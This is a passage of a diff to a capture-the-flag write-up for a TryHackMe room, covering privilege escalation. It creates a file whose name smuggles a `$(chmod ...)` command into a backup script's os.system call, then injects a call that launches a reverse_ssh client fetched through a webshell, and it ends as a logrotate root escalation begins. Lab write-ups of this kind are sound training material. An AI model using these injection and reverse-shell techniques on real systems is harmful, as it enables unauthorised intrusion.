ChrisPritchard/ctf-writeups/tryhackme-rooms/plottedlms.md

                     os.system('/usr/bin/cp "' + root + '/' + file + '" ' + backup_location)
     ```

-10. To exploit this, as we have write into `/var/www/uploadedfiles/filedir/`, we can create a file in there like `$(chmod -R 777 ~)`.
-This can be done with `touch \$\(chmod\ -R\ 777\ \~\)` in that folder.
-Within a minute, all files in plot_admin's home directory will be universally writable.
+10. To exploit this, as we have write into `/var/www/uploadedfiles/filedir/`, we can create a file in there like `$(chmod 777 backup.py)`.
+This can be done with `touch \$\(chmod\ 777\ backup.py)` in that folder.
+Within a minute, the backup file will be writable by our user.
-11. Next, adding `os.system("/path/to/revshell")` into backup.py (after removing the chmod file above, as it breaks the script) will get a reverse shell as plot_admin.
+11. Next, adding `os.system("/var/www/9020/moodle/blocks/rce/lang/en/client")` into backup.py (after removing the chmod file above, as it breaks the script) will get a reverse shell as plot_admin.
+Note this is using the reverse_ssh client I downloaded with the webshell.

-> the root privesc seemed *real* flaky, and I tried over multiple restarts to get it to work, only persisting once I checked and my approach *is* intended.
+> The following root privesc seemed *real* flaky, and I tried over multiple restarts to get it to work, only persisting once I checked and my approach *is* intended.
 So, just be aware that this might require a few goes.
+Best bet I've found is to get in there quick - I've had it work semi-seamlessly if I'm running logrotate 10 minutes after machine boot.

 13. Careful enumeration or using pspy will reveal logrotate is being used with a custom config file at `/etc/logbackup.cfg`.
 The contents of this are: